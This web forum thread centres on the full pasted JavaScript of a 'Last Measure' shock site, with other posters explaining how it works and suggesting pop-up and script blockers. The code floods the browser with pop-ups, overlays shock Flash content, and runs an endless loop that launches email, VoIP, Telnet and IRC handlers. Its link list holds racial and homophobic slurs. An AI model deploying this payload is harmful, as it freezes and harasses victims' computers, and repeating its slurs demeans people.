What Does This Do?

[Guest FirefoxRocks]

Since a forum was hacked, I got send an email with a link to a very dangerous website. Since it crashed my computer, I decided to investigate the JavaScript safely. I viewed the source through the W3C validator and this is what it came up with:Source URL: http://validator.w3.org/check?uri=http://r...Validator/1.654Actual Page URL: http://rules.on.nimp.org/WARNING! The JavaScript code below is very dangerous.

function altf4key() {if (event.keyCode == 18 || event.keyCode == 115)alert("Our lawyer has informed us that we need a warning. So, if you are under the age of 18 or find this offensive, please leave immediately");}function ctrlkey() {if (event.keyCode == 17)alert("Our lawyer has informed us that we need a warning. So, if you are under the age of 18 or find this offensive, please leave immediately");}function delkey() {if (event.keyCode == 46)alert("LAST MEASURE BY PENISBIRD, Rolloffle, and Rucas.\nStarring:\nSpin\nTubgirl\nLemonparty\nBob Goatse\nPenisbird\nPillowfight\nChristmas\nRusty's Wife\nWhat the ######? That guy's ###### is showing in his baby's picture!\n\n\nTotal, complete, all-versions, popup blocker bashing-to-pieces by goat-see\nnhey.swf by rkz\nPROPS TO GNAA. LOL HY -- DiKKy (GNAA NORWAY CORRESPONDANT)\nUpdated by sam, Jmax, JacksonBrown, Dessimat0r, timecop, and others.\n");}var nom = navigator.appName.toLowerCase();var agt = navigator.userAgent.toLowerCase();var is_major = parseInt(navigator.appVersion);var is_minor = parseFloat(navigator.appVersion);var is_ie = (agt.indexOf("msie") != -1);var is_ie4up = (is_ie && (is_major >= 4));var is_nav = (nom.indexOf('netscape')!=-1);var is_nav4 = (is_nav && (is_major == 4));var is_mac = (agt.indexOf("mac")!=-1);var is_gecko = (agt.indexOf('gecko') != -1);// GECKO REVISIONvar is_rev = 0if (is_gecko) { temp = agt.split("rv:") is_rev = parseFloat(temp[1])}function procreate() { for(i = 0; i < 16; i++) { popUp("index.php?popup=1"); }}function popUp(URL) { day = new Date(); id = day.getTime(); eval("page" + id + " = window.open(URL, '_blank', 'toolbar=0,scrollbars=0,location=1,statusbar=0,menubar=0,resizable=0,width=640,height=583');");}goatseflash = '<div id="hello" style="z-index: 50; position: fixed; top: 0px; left: 0px; width: 100%; height: 100%;">';goatseflash += ' <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="100%" height="100%">';goatseflash += ' <param name="movie" value="http://static.nimp.org/flash/hello.swf" />'goatseflash += ' <param name="wmode" value="transparent" />';goatseflash += ' </object>'goatseflash += '</div>';function load_goatse() { document.body.innerHTML += goatseflash; setTimeout("unload_goatse()", 3000); // 3s}function unload_goatse() { document.getElementById("hello").style.display = 'none';}var protos = [ "http://static.nimp.org/lm.pdf", "http://static.nimp.org/jews.wmv", "irc://irc.gnaa.us/gnaa", "irc://irc.efnet.org/politics", "news:alt.flame.niggers", "news:alt.flame.faggots", "mailto:JOIN@THE.GNAA?subject=2006_RECRUITMENT_DRIVE&body=www.gnaa.us", "callto://JOIN_THE_GNAA__2005_RECRUITMENT_DRIVE", "aim:GoIM?screenname=Gary_Niger&message=HY+LOL+HY+LOL", "rlogin://1.1.1.1:80", "telnet://1.1.1.1:80", "aim:addbuddy?listofscreennames=HY,LOL,HY,LOL,HY,LOL,join,the,gnaa,2006,RECRUITMENT,DRIVE,heartiez2incog&groupname=gnaa", "mailto:JOIN@THE.GNAA?subject=2006_RECRUITMENT_DRIVE&body=www.gnaa.us", "ed2k://|file|Gayniggers From Outer Space [GNAA Digitally Remastered].avi|134174720|F8AF9D8A7091CD7A7B8968C9EB397C02|/", ];function add(str) { div = document.getElementById('goatse'); div.innerHTML = '<iframe style="width: 1; height: 1;" src="' + str + '"></iframe>';}function ruin() { document.body.innerHTML += '<div id="goatse">Y HALLO THAR!</div>'; while (1) { for (i = 0; i < protos.length; i++) { add(protos[i]); } }}

This code can open Skype, Telnet, Windows Live Mail, Thunderbird (or any email clients) and endless amounts of popup windows. Even if Skype and Telnet aren't directly opened (Firefox and Chrome prompt you to "Launch application" like several million times), Windows Live Mail AND Thunderbird are opened. Since the CPU is dedicated to the browser and wlmail.exe/thunderbird.exe, Windows Task Manager is very slow to respond if you can manage to kill the browser and the email clients.I've also heard this can open IRC clients but I don't have any installed thank goodness. Also, AVG detected a virus when the page loaded.Now I see that alert boxes are created onkeypress with the first 3 functions, and some stuff is being written into the innerHTML of some stuff, but how does this JavaScript launch VoIP, email and IRC software?!

[Synook]

It just calls the associated pseudo-protocols, e.g. irc: (IRC), mailto: (email), callto: (VoIP), telnet: (Telnet), etc. This isn't technically dangerous unless in your haste to close everything you click "send", then their spam is sent.

[Guest FirefoxRocks]

Well actually it is dangerous because with VoIP, it automatically places a call somewhere. And it overloads the CPU because the browser opens many things repeatedly. With Firefox/Chrome, you can cancel "Launch application" (except for email). But with innerHTML, how does it automatically click the link?

[Ingolme]

It doesn't "click" the link, it just opens the URL in a tiny <iframe> element.

[justsomeguy]

The Flash movie is probably opening new windows also, since new windows still open with Javascript disabled.

[rnd me]

all the more reason to use noscript...

[justsomeguy]

I could swear I just said the windows continue to open even with Javascript disabled. That's what Flashblock is for, noscript won't help with that.